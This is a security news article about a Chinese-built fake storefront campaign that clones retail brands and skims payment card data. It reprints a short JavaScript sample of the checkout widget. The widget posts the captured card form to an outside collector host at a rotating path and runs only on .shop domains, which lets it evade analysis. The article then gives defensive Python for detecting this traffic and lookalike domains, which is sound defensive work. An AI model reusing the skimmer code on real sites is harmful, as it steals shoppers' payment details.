Wednesday, August 6, 2025

Beware of Chinese Fake e-Commerce Websites Mimicking Apple and Wrangler Jeans and Abusing Payment Services Like MasterCard and PayPal


The deluge of bargain-priced ads that flooded social networks during Latin America’s “Hot Sale 2025” has now been traced to a sprawling Chinese-built malware operation that weaponizes thousands of convincingly branded storefronts to harvest payment credentials.

First noticed by Mexican journalist Ignacio Gómez Villaseñor while monitoring suspicious domains hosted on a single IP, the campaign rapidly expanded beyond Spanish-speaking audiences, cloning Apple’s accessories catalogue in English one day and Wrangler Jeans the next.

Victims are funnelled through glossy checkout pages that accept Visa, MasterCard, PayPal and even Google Pay, masking the theft with authentic logos and a working countdown timer that simulates order processing.


Silent Push analysts identified the infrastructure after discovering an obfuscated “/cn/模板.css” path embedded in every template, a giveaway that the kit’s developer left debugging comments in Mandarin.

Pivoting on that fingerprint exposed more than 9 000 domains registered since March—typos like “harborfrieght.shop” and “tommyilfigershop.com”—all resolving to a rotating pool of Alibaba-hosted servers.

The group keeps overhead low by scraping genuine product imagery directly from the real retailers each time a shopper opens the page, ensuring that takedowns of one brand have no effect on the others.

Within weeks, payment processors were reporting spikes in disputed transactions tied to virtual card numbers, an indication that Google Pay’s tokenisation alone cannot shield users if goods are never shipped.

Charge-back ratios climbed past the threshold at several acquirers, briefly blacklisting innocent merchants whose BINs overlapped with the rogue gateways.

Meanwhile, consumer-grade antivirus tools remained silent because no executable payload is ever dropped; all malicious logic lives in JavaScript delivered from the same CDN that hosts legitimate Shopify plug-ins.

Domain Flux and Widget Obfuscation—The Campaign’s Key Evasion Trick

To stay online, the operators register forty to fifty look-alike domains per day and rotate them behind reverse proxies that rewrite HTTP headers on the fly.

Each store’s checkout widget ships with a tiny script that hides its true origin:

// stripped sample from Figure_1_checkout_widget.js
// `frm` (the checkout form element) and `showThankYou` (the fake confirmation
// screen) are referenced by the widget but not included in this excerpt.
if (window.location.hostname.endsWith('.shop')) {
  // per-load collector path: base64 of the current epoch-ms, truncated to 6 chars
  const p = '/assets/pay/' + btoa(Date.now()).slice(0, 6) + '.php';
  // the captured card form is POSTed to the collector, then the fake "thank you" page is shown
  fetch('https://api.statimgcdn.com' + p, {method: 'POST', body: new FormData(frm)})
    .then(res => res.text()).then(showThankYou);
}

The conditional ensures the malicious code only executes on domains ending in “.shop”, so it stays dormant when analysts copy the HTML to a lab VM where the hostname differs. By base64-encoding a timestamp, the collector path changes on every page load, defeating signature-based web filters that rely on fixed IOC lists.

Silent Push researchers note that once a domain is reported, DNS records switch to a fresh IP and the widget rewrites itself with a new CDN stub, preserving the merchant façade while nullifying blacklists.

Fake website (Source – Silent Push)

The fake website shows the same Wrangler layout reused under “harborfrieght.shop”, illustrating how the kit simply substitutes brand logos and colour palettes during deployment.

Because no malware binary is installed, endpoint detection must instead correlate rapid domain churn with payment-form exfiltration, a task better suited to network-level anomaly engines than to traditional AV.
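The correlation described above can be expressed as a small log-analysis routine. The following is an added example written for this article, not code from Silent Push or from the campaign's kit; it runs over a constructed set of web-proxy records (the record layout, the "outlet-example.shop" storefront and the timestamp-looking path stems are all made up for the demonstration) and flags cross-origin form posts whose path stem base64-decodes to an epoch-millisecond prefix, the pattern the widget above produces, then groups the hits by collector host so that one destination fed by many unrelated storefronts stands out.

```python
import base64
import re
from collections import defaultdict

# Constructed sample of web-proxy records (not real telemetry):
# (page_host, method, dest_host, path, content_type)
PROXY_EVENTS = [
    ("harborfrieght.shop", "POST", "api.statimgcdn.com", "/assets/pay/MTcyMj.php", "multipart/form-data"),
    ("tommyilfigershop.com", "POST", "api.statimgcdn.com", "/assets/pay/MTcyMz.php", "multipart/form-data"),
    ("outlet-example.shop", "POST", "api.statimgcdn.com", "/assets/pay/MTcyNA.php", "multipart/form-data"),
    # product imagery scraped from the genuine retailer on each page view: not a form post
    ("harborfrieght.shop", "GET", "www.harborfreight.com", "/images/product/123.jpg", None),
    # a legitimate shop posting its own checkout to its own origin
    ("shop.example.com", "POST", "shop.example.com", "/checkout/submit", "application/x-www-form-urlencoded"),
    ("shop.example.com", "GET", "cdn.shopify.com", "/s/files/theme.js", None),
]


def registrable(host):
    """Naive eTLD+1 (last two labels). Adequate for the constructed data;
    production code should use a public-suffix list."""
    return ".".join(host.lower().split(".")[-2:])


def rotating_stem(path):
    """True if the final path segment is a 6-char base64 stem that decodes to a
    run of digits starting with '1', i.e. the prefix of a millisecond epoch as
    produced by btoa(Date.now()).slice(0, 6)."""
    m = re.search(r"/([A-Za-z0-9+/]{6})\.php$", path)
    if not m:
        return False
    try:
        decoded = base64.b64decode(m.group(1) + "==")  # 6 chars -> 4 bytes with padding
    except Exception:
        return False
    return decoded.isdigit() and decoded.startswith(b"1")


def find_exfil_candidates(events):
    """Form posts leaving the storefront's own registrable domain towards a
    rotating, timestamp-derived endpoint."""
    hits = []
    for page_host, method, dest_host, path, ctype in events:
        if method != "POST" or not ctype or not ctype.startswith("multipart/form-data"):
            continue
        if registrable(page_host) == registrable(dest_host):
            continue  # same-origin checkout, nothing unusual
        if rotating_stem(path):
            hits.append((page_host, dest_host, path))
    return hits


def churn_by_collector(hits):
    """Group candidate posts by destination. Many distinct storefront domains
    feeding a single collector is the churn-plus-exfiltration signal."""
    groups = defaultdict(set)
    for page_host, dest_host, _ in hits:
        groups[dest_host].add(page_host)
    return {dest: sorted(pages) for dest, pages in groups.items()}


if __name__ == "__main__":
    for dest, pages in churn_by_collector(find_exfil_candidates(PROXY_EVENTS)).items():
        print(f"{dest}: {len(pages)} storefront(s) -> {pages}")
```

The stem check is deliberately narrow to the pattern shown in the widget; in a real deployment the grouping step is the durable part, since it keys on the relationship between storefronts and a shared collector rather than on any single path or domain that the operators can rotate away.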

For now, vigilant URL inspection—look for subtle misspellings and mismatched TLS certificates—remains the most reliable defence until issuers can integrate Silent Push’s feed of Indicators of Future Attack into real-time fraud scoring.
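The two manual checks recommended above, spotting a misspelt brand in the domain and a certificate that does not cover the hostname, can be automated. The code below is an added example for this article, not Silent Push's feed or any vendor's logic. It compares the registrable label against a small brand list using edit distance (after stripping filler suffixes such as "shop" or "store"), and applies an RFC 6125-style hostname match against the certificate's DNS names. The brand list, the suffix list and the certificate name lists in the sample observations are constructed for the demonstration; the misspelt domains themselves are the ones named in the article.

```python
# Constructed reference list of brands the kit has been seen to impersonate
BRANDS = ("harborfreight", "tommyhilfiger", "wrangler", "apple")

# Filler words the kit appends to a brand to form a domain label (constructed list)
FILLER_SUFFIXES = ("shop", "store", "online", "outlet", "deals")


def levenshtein(a, b):
    """Classic edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def brand_label(host):
    """Second-level label with filler suffixes removed: 'tommyilfigershop.com' -> 'tommyilfiger'."""
    labels = host.lower().rstrip(".").split(".")
    label = labels[-2] if len(labels) >= 2 else labels[0]
    for s in FILLER_SUFFIXES:
        if label.endswith(s) and len(label) > len(s):
            label = label[: -len(s)]
    return label


def lookalike(host, brands=BRANDS, max_dist=2):
    """Return (brand, distance) when the host's label is a near miss of a known
    brand, None when it is exact or unrelated."""
    label = brand_label(host)
    best = min(brands, key=lambda b: levenshtein(label, b))
    d = levenshtein(label, best)
    if d == 0 or d > max_dist:
        return None
    return (best, d)


def cert_covers(hostname, dns_names):
    """RFC 6125-style check: exact match, or a single leading wildcard label
    that matches exactly one label and never stands for the whole public suffix."""
    h = hostname.lower().rstrip(".").split(".")
    for name in dns_names:
        n = name.lower().rstrip(".").split(".")
        if len(n) != len(h):
            continue
        if n == h:
            return True
        if n[0] == "*" and len(n) > 2 and n[1:] == h[1:]:
            return True
    return False


def assess(hostname, dns_names):
    """Combine both checks into a list of findings for one observed site."""
    findings = []
    hit = lookalike(hostname)
    if hit:
        findings.append(f"label '{brand_label(hostname)}' is {hit[1]} edit(s) from brand '{hit[0]}'")
    if not cert_covers(hostname, dns_names):
        findings.append("certificate does not cover hostname")
    return findings


if __name__ == "__main__":
    # Constructed observations: hostname plus the DNS names seen on its certificate
    observations = [
        ("harborfrieght.shop", ["*.shop"]),
        ("tommyilfigershop.com", ["tommyilfigershop.com"]),
        ("www.harborfreight.com", ["harborfreight.com", "www.harborfreight.com"]),
    ]
    for host, sans in observations:
        print(host, "->", assess(host, sans) or ["no findings"])
```

A hostname that trips only the certificate check may be a misconfigured but honest site; a near-miss brand label combined with a certificate that does not cover the name is the combination worth escalating.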


Tarun Chhetri